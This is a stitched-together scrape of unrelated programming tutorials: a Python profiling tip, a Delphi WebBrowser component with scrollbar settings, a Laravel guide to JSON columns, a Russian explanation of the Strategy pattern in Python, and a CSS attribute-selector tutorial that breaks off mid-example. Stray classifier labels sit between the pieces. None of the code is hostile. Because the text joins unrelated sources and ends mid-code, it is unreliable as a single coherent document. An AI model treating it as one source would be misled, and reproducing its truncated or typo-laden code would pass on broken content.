0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} • ncalls - Number of calls to function during profiling period • tottime - Number of seconds spent executing the function `9not other functions it calls) • percall - Average time spent in seconds spent in function per call • cumtime - Cumulative sends in call including other calls • cumtimepercall - Average seconds spent including other calls You can see the time spent in insert_value is the biggest time waster from bisect import bisect_left def insert_value(array, value):     i = bisect_left(array, value)     array.insert(i, value) Now the results: 30003 function calls in 0.067 seconds Ordered by: cumulative time ncalls tottime percall cumtime percall filename:lineno(function) 1 0.000 0.000 0.067 0.067 test.py:196(<lambda>) 1 0.007 0.007 0.067 0.067 test.py:182(insertion_sort) 10000 0.008 0.000 0.060 0.000 test.py:189(insert_value) 10000 0.028 0.000 0.028 0.000 {method 'insert' of 'list' objects} 10000 0.024 0.000 0.024 0.000 {built-in method _bisect.bisect_left} 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects} Sometimes for more complex issues you can use stats.print_callers() Use tracemalloc to Understand Memory Usage and Leaks# More about this in the book…Item 59 Source: • “Effective Python: 59 Specific Ways to Write Better Python (Effective Software Development Series).” - Brett Slatkin
__label__pos
0.880239
WebBrowserWithUI[支持设置滚动条] Delphi自带的WebBrowser是不含有滚动条设置的。下面的代码中加入了对滚动条的设置,如果是Delphi 7可以直接将下面的代码保存为pas文件进行安装,如果是2010则猛击此处下载我打包之后的控件包进行安装。 8) 安装之后可以通过上图的属性页面设置滚动条属性。 🙂 unit WebBrowserWithUI; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, OleCtrls, SHDocVw, COmObj, ActiveX; type TEnhancedWebBrowserUI = class(TPersistent) private FlatScrollBar: boolean; IE3DBorder: boolean; RightClickMenu: boolean; ScrollBar: boolean; public constructor Create; published property EnableScrollBars: boolean read ScrollBar write ScrollBar; property EnableFlatScrollBars: boolean read FlatScrollBar write FlatScrollBar; property EnableContextMenu: boolean read RightClickMenu write RightClickMenu; property Enable3DBorder: boolean read IE3DBorder write IE3DBorder; end; pDocHostUIInfo = ^TDocHostUIInfo; TDocHostUIInfo = packed record cbSize: ULONG; dwFlags: DWORD; dwDoubleClick: DWORD; pchHostCss: polestr; pchHostNS: polestr; end; IDocHostUIHandler = interface(IUnknown) ['{bd3f23c0-d43e-11cf-893b-00aa00bdce1a}'] function ShowContextMenu(const dwID: DWORD; const ppt: PPOINT; const pcmdtReserved: IUnknown; const pdispReserved: IDispatch): HRESULT; stdcall; function GetHostInfo(var pInfo: TDOCHOSTUIINFO): HRESULT; stdcall; function ShowUI(const dwID: DWORD; const pActiveObject: IOleInPlaceActiveObject; const pCommandTarget: IOleCommandTarget; const pFrame: IOleInPlaceFrame; const pDoc: IOleInPlaceUIWindow): HRESULT; stdcall; function HideUI: HRESULT; stdcall; function UpdateUI: HRESULT; stdcall; function EnableModeless(const fEnable: BOOL): HRESULT; stdcall; function OnDocWindowActivate(const fActivate: BOOL): HRESULT; stdcall; function OnFrameWindowActivate(const fActivate: BOOL): HRESULT; stdcall; function ResizeBorder(const prcBorder: PRECT; const pUIWindow: IOleInPlaceUIWindow; const fRameWindow: BOOL): HRESULT; stdcall; function TranslateAccelerator(const lpMsg: PMSG; const pguidCmdGroup: PGUID; const nCmdID: DWORD): HRESULT; stdcall; function GetOptionKeyPath(var pchKey: POLESTR; const dw: DWORD): HRESULT; stdcall; function GetDropTarget(const pDropTarget: IDropTarget; out ppDropTarget: IDropTarget): HRESULT; stdcall; function GetExternal(out ppDispatch: IDispatch): HRESULT; stdcall; function TranslateUrl(const dwTranslate: DWORD; const pchURLIn: POLESTR; var ppchURLOut: POLESTR): HRESULT; stdcall; function FilterDataObject(const pDO: IDataObject; out ppDORet: IDataObject): HRESULT; stdcall; end; TWebBrowserWithUI = class(TWebBrowser, IDocHostUIHandler) private { Private declarations } UIProperties: TEnhancedWebBrowserUI; protected { Protected declarations } public { Public declarations } constructor Create(AOwner: TComponent); override; destructor Destroy; override; function ShowContextMenu(const dwID: DWORD; const ppt: PPOINT; const pcmdtReserved: IUnknown; const pdispReserved: IDispatch): HRESULT; stdcall; function GetHostInfo(var pInfo: TDOCHOSTUIINFO): HRESULT; stdcall; function ShowUI(const dwID: DWORD; const pActiveObject: IOleInPlaceActiveObject; const pCommandTarget: IOleCommandTarget; const pFrame: IOleInPlaceFrame; const pDoc: IOleInPlaceUIWindow): HRESULT; stdcall; function HideUI: HRESULT; stdcall; function UpdateUI: HRESULT; stdcall; function EnableModeless(const fEnable: BOOL): HRESULT; stdcall; function OnDocWindowActivate(const fActivate: BOOL): HRESULT; stdcall; function OnFrameWindowActivate(const fActivate: BOOL): HRESULT; stdcall; function ResizeBorder(const prcBorder: PRECT; const pUIWindow: IOleInPlaceUIWindow; const fRameWindow: BOOL): HRESULT; stdcall; function TranslateAccelerator(const lpMsg: PMSG; const pguidCmdGroup: PGUID; const nCmdID: DWORD): HRESULT; stdcall; function GetOptionKeyPath(var pchKey: POLESTR; const dw: DWORD): HRESULT; stdcall; function GetDropTarget(const pDropTarget: IDropTarget; out ppDropTarget: IDropTarget): HRESULT; stdcall; function GetExternal(out ppDispatch: IDispatch): HRESULT; stdcall; function TranslateUrl(const dwTranslate: DWORD; const pchURLIn: POLESTR; var ppchURLOut: POLESTR): HRESULT; stdcall; function FilterDataObject(const pDO: IDataObject; out ppDORet: IDataObject): HRESULT; stdcall; published { Published declarations } property UISettings: TEnhancedWebBrowserUI read UIProperties write UIProperties; end; const DOCHOSTUIFLAG_DIALOG = $00000001; DOCHOSTUIFLAG_DISABLE_HELP_MENU = $00000002; DOCHOSTUIFLAG_NO3DBORDER = $00000004; DOCHOSTUIFLAG_SCROLL_NO = $00000008; DOCHOSTUIFLAG_DISABLE_SCRIPT_INACTIVE = $00000010; DOCHOSTUIFLAG_OPENNEWWIN = $00000020; DOCHOSTUIFLAG_DISABLE_OFFSCREEN = $00000040; DOCHOSTUIFLAG_FLAT_SCROLLBAR = $00000080; DOCHOSTUIFLAG_DIV_BLOCKDEFAULT = $00000100; DOCHOSTUIFLAG_ACTIVATE_CLIENTHIT_ONLY = $00000200; DOCHOSTUIFLAG_OVERRIDEBEHAVIOURFACTORY = $00000400; DOCHOSTUIFLAG_CODEPAGELINKEDFONTS = $00000800; DOCHOSTUIFLAG_URL_ENCODING_DISABLE_UTF8 = $00001000; DOCHOSTUIFLAG_URL_ENCODING_ENABLE_UTF8 = $00002000; DOCHOSTUIFLAG_ENABLE_FORMS_AUTOCOMPLETE = $00004000; IID_IDocHostUIHandler: TGUID = '{bd3f23c0-d43e-11CF-893b-00aa00bdce1a}'; procedure Register; implementation procedure Register; begin RegisterComponents('Samples', [TWebBrowserWithUI]); end; { TEnhancedWebBrowserUI } constructor TEnhancedWebBrowserUI.Create; begin ScrollBar := True; FlatScrollBar := False; IE3DBorder := True; RightClickMenu := True; end; { TWebBrowserWithUI } constructor TWebBrowserWithUI.Create(AOwner: TComponent); begin inherited; UIProperties := TEnhancedWebBrowserUI.Create; end; destructor TWebBrowserWithUI.Destroy; begin UIProperties.Free; inherited; end; function TWebBrowserWithUI.EnableModeless(const fEnable: BOOL): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.FilterDataObject(const pDO: IDataObject; out ppDORet: IDataObject): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.GetDropTarget(const pDropTarget: IDropTarget; out ppDropTarget: IDropTarget): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.GetExternal(out ppDispatch: IDispatch): HRESULT; begin result := S_OK; end; function TWebBrowserWithUI.GetHostInfo(var pInfo: TDOCHOSTUIINFO): HRESULT; begin pInfo.cbSize := SizeOf(pInfo); pInfo.dwFlags := 0; if not UIProperties.EnableScrollBars then pInfo.dwFlags := pInfo.dwFlags or DOCHOSTUIFLAG_SCROLL_NO; if UIProperties.EnableFlatScrollBars then pInfo.dwFlags := pInfo.dwFlags or DOCHOSTUIFLAG_FLAT_SCROLLBAR; if not UIProperties.Enable3DBorder then pInfo.dwFlags := pInfo.dwFlags or DOCHOSTUIFLAG_NO3DBORDER; result := S_OK; end; function TWebBrowserWithUI.GetOptionKeyPath(var pchKey: POLESTR; const dw: DWORD): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.HideUI: HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.OnDocWindowActivate( const fActivate: BOOL): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.OnFrameWindowActivate( const fActivate: BOOL): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.ResizeBorder(const prcBorder: PRECT; const pUIWindow: IOleInPlaceUIWindow; const fRameWindow: BOOL): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.ShowContextMenu(const dwID: DWORD; const ppt: PPOINT; const pcmdtReserved: IUnknown; const pdispReserved: IDispatch): HRESULT; begin if UIProperties.EnableContextMenu then result := S_FALSE else result := S_OK; end; function TWebBrowserWithUI.ShowUI(const dwID: DWORD; const pActiveObject: IOleInPlaceActiveObject; const pCommandTarget: IOleCommandTarget; const pFrame: IOleInPlaceFrame; const pDoc: IOleInPlaceUIWindow): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.TranslateAccelerator(const lpMsg: PMSG; const pguidCmdGroup: PGUID; const nCmdID: DWORD): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.TranslateUrl(const dwTranslate: DWORD; const pchURLIn: POLESTR; var ppchURLOut: POLESTR): HRESULT; begin result := S_FALSE; end; function TWebBrowserWithUI.UpdateUI: HRESULT; begin result := S_FALSE; end; end. 原创文章,转载请注明: 转载自 obaby@mars 本文标题: 《WebBrowserWithUI[支持设置滚动条]》 本文链接地址: http://h4ck.org.cn/2011/03/webbrowserwithui/ 分享文章: 猜你喜欢: 发表评论 您的电子邮箱地址不会被公开。 必填项已用*标注
__label__pos
0.84053
Laravel 10 Store JSON in Database Example By Hardik Savani July 26, 2023 Category : Laravel Hello Guys, This article will provide some of the most important example laravel 10 store json in database. I explained simply about laravel 10 store json in database. you can understand a concept of laravel 10 save json in database. In this article, we will implement a laravel 10 save json in db. JSON (JavaScript Object Notation) is a lightweight, text-based format for data exchange that is easy for humans to read and write and easy for machines to parse and generate. JSON is a popular data format used in web applications, APIs, and data exchange between systems. JSON data is represented as key-value pairs and uses a syntax similar to JavaScript object literals. Each key-value pair is separated by a comma and enclosed in curly braces {}. Keys are always strings, while values can be strings, numbers, boolean values, arrays, or nested JSON objects. Sometimes, if we have large data or unfixed columns then we can not create too many fields in a database table with the nullable field. so we have to use JSON data type to store values, that way we can store large data or unstructured data. if you want to store a JSON array in a database in laravel then I will give you a simple example of how to store a JSON array store and access it from the database in laravel. In this example, we will start by creating a migration with a JSON column. Then we will create a model with getter and setter methods. When creating records, we can pass data as an array, and when retrieving records, we will receive an array. So, let's take a look at a simple example to learn how to implement this. Step 1: Install Laravel This is optional; however, if you have not created the laravel app, then you may go ahead and execute the below command: composer create-project laravel/laravel example-app Step 2: Create Migration Here, we need create database migration for "items" table with title and data(JSON Column) columns and also we will create model for items table. php artisan make:migration create_items_table database/migrations/2022_07_11_141714_create_items_table.php <?php use Illuminate\Database\Migrations\Migration; use Illuminate\Database\Schema\Blueprint; use Illuminate\Support\Facades\Schema; return new class extends Migration { /** * Run the migrations. * * @return void */ public function up(): void { Schema::create('items', function (Blueprint $table) { $table->id(); $table->string('title'); $table->json('data')->nullable(); $table->timestamps(); }); } /** * Reverse the migrations. * * @return void */ public function down(): void { Schema::dropIfExists('items'); } }; Then run migration command to create items table. php artisan migrate Step 3: Create Model In this step, we will create Item.php model with getter setter. let's create model and update following code: php artisan make:model Item App/Models/Item.php <?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Casts\Attribute; class Item extends Model { use HasFactory; /** * Write code on Method * * @return response() */ protected $fillable = [ 'title', 'data' ]; /** * Get the user's first name. * * @return \Illuminate\Database\Eloquent\Casts\Attribute */ protected function data(): Attribute { return Attribute::make( get: fn ($value) => json_decode($value, true), set: fn ($value) => json_encode($value), ); } } Step 4: Create Route In third step, we will create one route for testing. so create one route here. routes/web.php <?php use Illuminate\Support\Facades\Route; use App\Http\Controllers\ItemController; /* |-------------------------------------------------------------------------- | Web Routes |-------------------------------------------------------------------------- | | Here is where you can register web routes for your application. These | routes are loaded by the RouteServiceProvider within a group which | contains the "web" middleware group. Now create something great! | */ Route::get('item', [ItemController::class, 'index']); Step 5: Create Controller In this step, we will create ItemController file and write index() method to create item records with array and access as array. app/Http/Controllers/ItemController.php <?php namespace App\Http\Controllers; use Illuminate\Http\Request; use App\Models\Item; class ItemController extends Controller { /** * Write code on Method * * @return response() */ public function index() { $input = [ 'title' => 'Demo Title', 'data' => [ '1' => 'One', '2' => 'Two', '3' => 'Three' ] ]; $item = Item::create($input); dd($item->data); } } Run Laravel App: All the required steps have been done, now you have to type the given below command and hit enter to run the Laravel app: php artisan serve Now, Go to your web browser, type the given URL and view the app output: http://localhost:8000/item You can see database output and print variable output: Database Output: Output: array:3 [ 1 => "One" 2 => "Two" 3 => "Three" ] I hope it can help you...
__label__pos
0.944257
Sign up × Programmers Stack Exchange is a question and answer site for professional programmers interested in conceptual questions about software development. It's 100% free. I'm trying to understand why the output file sizes are significantly different when using a C and a C++ compiler. I was writing a small hello world program in C and C++, I noticed that in C version, the size of the executable was 93.7KB and in C++, the size of the same hello world program was 1.33MB. I am not sure why that is. I think it may be because C++ has more libraries and namespaces to use so I removed the using namespace std line and simply used std::cout and still the result was the same. C #include <stdio.h> int main() { printf("hello world"); return 0; } // size 93.7KB C++ #include <iostream> int main() { std::cout<<"Hello world"; return 0; } // size 1.33MB There doesn't seem to be much difference in the code above. Is there some sort of compiler difference that creates the differing file sizes? share|improve this question 3   Sort of explains why C is used a lot on embedded devices. – Robert Harvey Jun 26 '14 at 16:07 1   Also, it would be a fairer test if you were to write the same exact code in both languages. Even then, I'm not sure that would rid you of the difference, since C++ is much more complicated to compile (and thus would be done differently). – Panzercrisis Jun 26 '14 at 16:07 3   as far as I can tell, this has been asked and answered at SO: Why is a C/C++ “Hello World” in the kilobytes? @RobertHarvey FWIW Java ME CLDC 1.0 footprint is per my recollection 128K, not too much even for end '90s embedded devices – gnat Jun 26 '14 at 16:12 2   @Hawk The fact that C++ has classes and all the other stuff associated with them is a large part of the reason that C is lower level and closer to the hardware. Still you can usually do the same things in C++ as you can in C. Since C is basically a subset of C++ - without a lot of the features in C++ - it takes longer to write big, huge programs, but it will run somewhat faster. As for interacting with other languages...do you mean like writing assembly language into the C++ code? Yeah, C++ supports that, but I'm not sure if C does or not. – Panzercrisis Jun 26 '14 at 16:14 5   There is no question here. Furthermore, even if there was, that question would be unanswerable without specific knowledge about compiler and compilation flags used. The only way to get a precise answer to a question why C++ executable would be so much bigger and what exactly takes up the bytes would be to use some kind of a binary analysis tool (e.g. readelf on Unix systems, part of GNU binutils) or a hex editor to investigate file sections and contents. What comes to languages themselves, there's absolutely no reason for a difference like that. C++ output could be just as small as C. – zxcdw Jun 26 '14 at 18:30 4 Answers 4 up vote 14 down vote accepted Most of the C++ standard library, including all the streams which cout is part of, are inline template classes. Whenever you #include one of these inline library components, the compiler will copy and paste all that code to the source file that is including it. This will help the code to run faster, but will also add a lot of bytes to the final executable. This is likely the reason for the results you got. Doing a similar test with the clang compiler on OSX (Apple LLVM version 5.1), using default flags, I got comparable results: hello_cpp_cout: #include <iostream> int main() { std::cout << "Hello world" << std::endl; return 0; } Size: 14,924 bytes hello_c: #include <stdio.h> int main() { printf("hello world\n"); return 0; } Size: 8,456 bytes And, as a bonus, I tried to compile a .cpp file with the exact same code as hello_c, i.e.: using printf instead of cout: hello_cpp_printf: #include <stdio.h> int main() { printf("hello world\n"); return 0; } Size: 8,464 bytes As you can see, the executable size is hardly related to the language, but to the libraries you include in your project. Update: As it was noted by several comments and other replies, the choice of compiler flags will also be influential in the size of the compiled executable. A program compiled with debug flags will be a lot larger than one compiled with release flags, for example. share|improve this answer      Doesn't really explain a 1.33MB file size, though. – Robert Harvey Jun 26 '14 at 21:06      He must be using Visual Studio :P – glampert Jun 27 '14 at 1:17      thanks, dude..i'm using dev c++ and it did work.. you're right, the libraries indeed do give too much space – Hawk Jul 2 '14 at 7:59 There doesn't seem to be much difference in the code above. Yes there is. It's a totally different code. The c++ iostream library relies heavily on template which creates more inline code and so the C++ executable is bigger. Another reason is that you did not remove debug sympols from the executable files, and for C++ the symbols are quite verbose. If you are under linux, you can use the "strip" command to remove those symbols and the executable size will shrink. share|improve this answer The difference in executable sizes will be heavily dependent on what type of linkage is specified, optimisations and the compiler(s) being used. Given the significant difference in final sizes, it looks like the C++ variant is being statically linked with the runtime. Remove or change that and you should see a drop in the C++ size; for gcc (g++) look for --static* et. al and for msvc /MD and /MT share|improve this answer There is actually quite a lot of difference. The C code uses unformatted, unlocalized output. The C++ equivalent has quite a lot of gunk in it for changing locales and that kind of thing. Functionally, they are far from equivalent. You just happen to be using only a tiny subset of the C++ interface. However more generally, the larger code sizes are a defect of this particular portion of the Standard library in particular, which is well known to be over-engineered, slow, and large, rather than the C++ language in general. share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.570513
Posted by Sponsored Post Posted on 4 September 2023 Safeguarding Personal Information in the Digital Era: Juggernaut (JGN) and Privacy In today’s digital age, the protection of personal information has become a paramount concern. With the increasing prevalence of cyber threats and the collection of vast amounts of data by various entities, individuals need to be proactive in safeguarding their personal information. This article explores the importance of privacy in the digital era, Juggernaut (JGN), a cutting-edge technology, can also play a pivotal role in this regard. Apart from this, bitindexai.top can help you get started with crypto trading. Try the advanced trading features now! The Significance of Privacy Understanding the Digital Landscape The rapid advancement of technology has transformed the way we live, work, and communicate. The internet has opened up a world of opportunities, enabling us to access information, connect with others, and conduct financial transactions with ease. However, this convenience comes at a cost—our personal information is increasingly vulnerable to unauthorized access, identity theft, and misuse. The Value of Personal Information Our personal information, such as our names, addresses, financial details, and online activities, holds immense value. It can be used for targeted advertising, market research, or even more malicious purposes. Cybercriminals and data brokers are constantly looking for opportunities to exploit this information for their gain. Therefore, it is crucial to take proactive measures to safeguard our personal data. The Role of Juggernaut (JGN) in Privacy Protection Introducing Juggernaut (JGN) Juggernaut (JGN) is a revolutionary technology that leverages blockchain and encryption to create a decentralized platform for secure and private communication. It aims to empower individuals with full control over their personal data, ensuring their privacy is preserved in the digital realm. Secure Communication Juggernaut provides end-to-end encryption for all communication conducted on its platform. This means that messages, calls, and other forms of communication remain encrypted throughout the entire transmission process. Even if intercepted, the data is virtually impossible to decipher without the encryption keys. By utilizing Juggernaut, individuals can communicate securely and confidently, knowing that their conversations are protected from prying eyes. Decentralized Storage Traditional centralized platforms often store user data in vulnerable servers, making it an attractive target for hackers. Juggernaut takes a different approach by employing decentralized storage systems. Instead of relying on a single server, user data is distributed across multiple nodes, ensuring that even if one node is compromised, the entire system remains secure. This decentralized architecture makes it significantly harder for attackers to breach the system and gain unauthorized access to personal information. User-Controlled Data Sharing Juggernaut puts the power of data sharing back into the hands of individuals. Users have the ability to choose which data they want to share and with whom. This user-controlled approach ensures that personal information is not indiscriminately collected and shared without consent. By giving individuals control over their data, Juggernaut strengthens privacy rights and promotes a more transparent and ethical digital environment. Best Practices for Personal Information Protection While Juggernaut provides robust privacy protection, it is essential for individuals to adopt best practices to safeguard their personal information effectively. Here are some key tips: • Strong and Unique Passwords Create strong, unique passwords for each online account to prevent unauthorized access. Consider using a reliable password manager to securely store and generate passwords. • Enable Two-Factor Authentication (2FA) Enable 2FA whenever possible to add an extra layer of security to your accounts. This typically involves providing a second form of verification, such as a fingerprint or a unique code sent to your mobile device. • Regularly Update Software and Devices Keep your software, apps, and devices up to date with the latest security patches. Software updates often include important security fixes that protect against known vulnerabilities. • Be Cautious with Personal Information Sharing Exercise caution when sharing personal information online. Avoid providing unnecessary details on social media platforms and be wary of unsolicited requests for personal information. • Utilize Encryption Tools Take advantage of encryption tools to secure your sensitive data. Encrypting files and emails adds an extra layer of protection, making it harder for unauthorized individuals to access your information. • Regularly Monitor Financial Statements Regularly review your bank and credit card statements for any suspicious activity. Report any unauthorized transactions or discrepancies immediately to your financial institution. • Educate Yourself on Privacy Policies Stay informed about the privacy policies of websites and online services you use. Understand how your personal information is collected, stored, and shared to make informed decisions about the platforms you engage with. Conclusion In an increasingly digitized world, safeguarding personal information is of utmost importance. Juggernaut (JGN) provides individuals with the tools and technologies necessary to protect their privacy in the digital era. By utilizing Juggernaut’s secure communication, decentralized storage, and user-controlled data sharing, individuals can take control of their personal information and minimize the risks associated with unauthorized access and misuse. Adopting best practices for personal information protection further strengthens the security of personal data. Remember, in the digital era, safeguarding personal information is not just an option—it’s a necessity.   From our advertisers
__label__pos
0.91879
Fork me on GitHub Многим разработчикам в процессе работы приходится решать похожие (если практически не идентичные) задачи и приходить к похожим решениям. Поэтому и появились “паттерны”, как шаблоны наилучших решений каких-то задач, позволяющие получить максимально гибкие решения, дающие возможность повторного использования кода. Паттерны”, в моем случае до сих пор оставались чем то немного пугающим словом, но желание познакомиться с ними взяло верх над страхом не разобраться с чем то и я решил, что попытаюсь. По каждой пройденной теме я буду делать маленькие заметки с реализацией того или иного паттерна на моем любимом языке Python. Имея некоторый опыт и скорее всего несознательно приходя к решениям которые уже где то описаны как готовые, я начал знакомиться с паттернами проектирования по книге Эрика Фримен и Элизабет Фримен “Паттерны проектирования”. Саму книгу можно купить тут Итак, некоторые принципы проектирования упомянутые авторами в первой главе: 1. Выделить аспекты приложения которые изменяются и отделить их от тех которые не изменяются. “Отделять изменяемое от постоянного” 2. Программировать на уровне интерфейсов, а не реализации. 3. Отдавать предпочтение композиции, а не наследованию. Тут следует заметить, что в понятия инкапуляции, полиморфизма, наследования и композиции мне уже достаточно ясны на этот момент. Инкапсуляция своими словами это отделение от главного содержания чего то второстепенного в отдельное место, “капсулу”. Часто относительно программирования инкапсуляция означает выявление и отделение каких то сущностей из цельного блока программы с целью улучшить структуру и иногда скрыть внутреннюю реализацию сущности (часто чтобы скрыть и предотвратить изменение частных “приватных” данных напрямую извне). Паттерн СТРАТЕГИЯ Паттерн **Стратегия** определяет семейство алгоритмов, инкапсулирует каждый из них и обеспечивает их взаимозаменяемость. Он позволяет модифицировать алгоритмы независимо от их использования на стороне клиента. К слову сказать под алгоритмом как я понимаю можно рассматривать любое поведение сущности. Т.к. поведение и есть некий алгоритм. В качестве примера авторы приводят модель утиного пруда, было показано как простое наследование не позволяет создать легко изменяемую модель. И в конечном итоге получилась вот такое решение: strategy_duck.png Поведение уточек вынесено (инкапсулировано) и представлено двумя различными интерфейсами FlyBehavior и QuackBehavior. Сущности FlyWithWings, FlyNoWay реализуют уже настоящие поведения - “уточка летит с помощью крыльев”, “уточка не летает”. Сущности Quack, Squeak, MuteQuack реализуют интерфейс QuackBehavior и соответственно реализуют уже какие то реальные качества, “крякает”, “пищит”, “не издает звуков”. Эти сущности и рассматриваются как алгоритмы, ведь действительно они определяют некие разные поведения. В абстрактный класс Duck “вмонтированы” (композиция) два объекта, представленные переменными типа интерфейса FlyBehavior и QuackBehavior, flyBehavior и quackBehavior соответственно. Получается клиент (Duck) использует инкапсулированные алгоритмы (сущности). Вдобавок Duck содержит набор методов позволяющих оперировать (менять) поведения, вызывать конкретные методы поведений. Из абстрактного класса Duck могут быть уже наследованы реальные “утки” MallardDuck, RubberDuck в которых может быть переопределен допустим метод отображения (как утка выглядит) и из которых уже можно создавать реальные экземпляры уток. Сам смысл примера в том что нужно выделить поведение (алгоритм), вынести в отдельную сущность и потом встроить (композировать) эту инкапсулированную сущность в код откуда она была вынесена. Ну и как видим соблюдено условие программировать на уровне интерфейсов - видим что в Duck были встроены именно интерфейсы а не какие то реальные классы. Это вносит гибкость, мы допустим можем легко добавить некий новый алгоритм поведения и использовать его не меняя кода реализации конкретной утки, можно просто установить новое поведение. Вот еще пример, допустим у нас есть персонажи, у которых есть возможность носить оружие. У оружия есть какие то персональные качества, название, сила удара. Пусть персонажи могут принимать и пользоваться любым оружием. Для примера пусть будет два персонажа Рыцарь (Knight) и Вор (Thief). Отделим (инкапсулируем) поведение оружия и применив композицию встроим оружие в обьект который будет представлять персонаж. Диаграмма классов будет выглядеть так: strategy_characters.png Чтобы реализовать интерфейс на Python я использую абстрактный класс с абстрактным методом, таким образом клиент не сможет создать экземпляр и будет вынужден переопределить абстрактный метод. Второй способ который я нашел - это способ основанный полностью на соглашении, т.е. объявляется обычный класс, методы которого возвращают NotImplemented. Таким образом клиентский код должен наследоваться и переопределять эти методы. К сожалению в Python нет специальной конструкции вроде interface как в Java, но способы реализовать абстракции к счастью имеются. Итак интерфейс и классы Knife, Sword реализующие оружие - выглядят так: from abc import ABCMeta, abstractmethod class IWeaponBehaviour(metaclass=ABCMeta): @abstractmethod def use_weapon(self): raise NotImplementedError() # 2nd approach #class IWeaponBehaviour: # def use_weapon(self): # raise NotImplementedError() class KnifeBehaviour(IWeaponBehaviour): def use_weapon(self): print("Knife hit...") print("Damage 2 ...") class SwordBehaviour(IWeaponBehaviour): def use_weapon(self): print("Sword hit...") print("Damage 5 ...") Классы реализуют метод интерфейса use_weapon(), уникальный для каждого типа оружия. Абстрактный класс персонажа и конкретные классы персонажей выглядят так: class AbstractCharacter(metaclass=ABCMeta): @property @abstractmethod def weapon(self): # IWeaponBehaviour object raise NotImplementedError() def set_weapon(self, wb): self.weapon = wb @abstractmethod def fight(self): raise NotImplementedError() def use_weapon(self): self.weapon.use_weapon() class Thief(AbstractCharacter): weapon = KnifeBehaviour() def fight(self): print("Thief do 1 step") self.use_weapon() class Knight(AbstractCharacter): weapon = SwordBehaviour() def fight(self): print("Knife do 2 steps") self.use_weapon() Класс конкретного персонажа использует конкретное поведение оружия, у абстрактного класса AbstractCharacter есть метод set_weapon() позволяющий менять оружие персонажа “на лету” и метод use_weapon() позволяющий использовать оружие. Поведение оружия используется как свойство, тут используется композиция, мы используем инкапсулированый объект Оружие в объекте Персонаж. Полный код выглядит вот так: # -*- coding: utf-8 -*- """ Created on Thu Jul 27 09:36:35 2017 @author: biceps """ from abc import ABCMeta, abstractmethod class IWeaponBehaviour(metaclass=ABCMeta): @abstractmethod def use_weapon(self): raise NotImplementedError() # 2nd approach #class IWeaponBehaviour: # def use_weapon(self): # raise NotImplementedError() class KnifeBehaviour(IWeaponBehaviour): def use_weapon(self): print("Knife hit...") print("Damage 2 ...") class SwordBehaviour(IWeaponBehaviour): def use_weapon(self): print("Sword hit...") print("Damage 5 ...") class AbstractCharacter(metaclass=ABCMeta): @property @abstractmethod def weapon(self): # IWeaponBehaviour object raise NotImplementedError() def set_weapon(self, wb): self.weapon = wb @abstractmethod def fight(self): raise NotImplementedError() def use_weapon(self): self.weapon.use_weapon() class Thief(AbstractCharacter): weapon = KnifeBehaviour() def fight(self): print("Thief do 1 step") self.use_weapon() class Knight(AbstractCharacter): weapon = SwordBehaviour() def fight(self): print("Knife do 2 steps") self.use_weapon() thief = Thief() thief.fight() thief.set_weapon(SwordBehaviour()) thief.fight() knight = Knight() knight.fight() в конце приведен небольшой проверочный код: thief = Thief() # cоздадим персонаж Thief thief.fight() # ударим оружием Thief - Knife по умолчанию thief.set_weapon(SwordBehaviour()) # дадим Thief другое оружие - Sword thief.fight() # попросим Вора ударить Мечом knight = Knight() # создадим Рыцаря knight.fight() # попросим Рыцаря ударить Мечом Результаты выглядят так: Thief do 1 step Knife hit... Damage 2 ... Thief do 1 step Sword hit... Damage 5 ... Knife do 2 steps Sword hit... Damage 5 ... Выводы Итак общий принцип используемый в паттерне СТРАТЕГИЯ это отделение неких сущностей в отдельные классы, которые можно использовать в клиентском коде с помощью композиции. Таким образом появляется возможность модифицировать эти сущности отдельно от кода клиента. В этом заключается гибкость и простота добавления новых сущностей и простота использования на стороне клиента. Comments comments powered by Disqus
__label__pos
0.64223
What are CSS Attribute Selectors? How to use CSS attribute selectors? Css attribute selectors we defines array symbol [] as we using in the javascript. We can use any attribute inside of this array symbol as [attribute Name] [id], [class], [style] etc. means if we are using html element, and all html element have a lot property as like id, class, title, style etc. These are the common attribute for the all html elements. We can give style for the all element through his attributes. Css attribute have following type of the attribute: CSS [attribute] Selector, CSS [attribute="value"] Selector, CSS [attribute|="value"] Selector, CSS [attribute~="value"] Selector, CSS [attribute$="value"] Selector, CSS [attribute^="value"] Selector, CSS [attribute*="value"] Selector Css attribute selector we can define from the more symbol like (|, ~, $, ^, *) also we can give style where define value as: div [title="Mr"], div [class="myClassName"] Means we can assign value and define according to value. As giving more example in the below: CSS [attribute="value"] Example: Example it's show color only where using value in the title "Mr". <style> [title~=Mr] {   background#0bf; } </style> <div title="I am Mr sheo">atribute test </div> <br> <div title="sheo Mr">atribute test </div> CSS [attribute] Example: Example it's show color only where using attribute id and class in the element. <style> div[id] {   background#0bf; } div [class] {   background#0bf; } </style> <div id="sheo">atribute test </div> <br> <div id="idname">atribute test </div> <div>     <p class="test">Paragraph id test</p> </div> CSS [attribute|="value"] Example: We are using an attribute with the | (pipe symbol) so it's affected class has test in stating with a dash (-) or hyphen. It will not be affected as using test in the last of the class or with _ . as below example: <style>         [class|=test] {             background#0bf;         }     </style>  <p class="test-text">Anything text</p>     <div class="test-section">atribute test </div>     <p class="testworld">text here any thing</p>     <p class="worldtest">text here any thing</p>     <p class="test_section">text here any thing</p> CSS [attribute$="value"] Example: We are using attribute value with the $ sign it will affected from the ends value. It will not affected which value getting starting or middle. You can more understand with below example: <style>         [class$=test] {             background#0bf;         }         [id$=any] {             background#0b6;         }     </style> <p class="text-test">Anything text</p>     <div 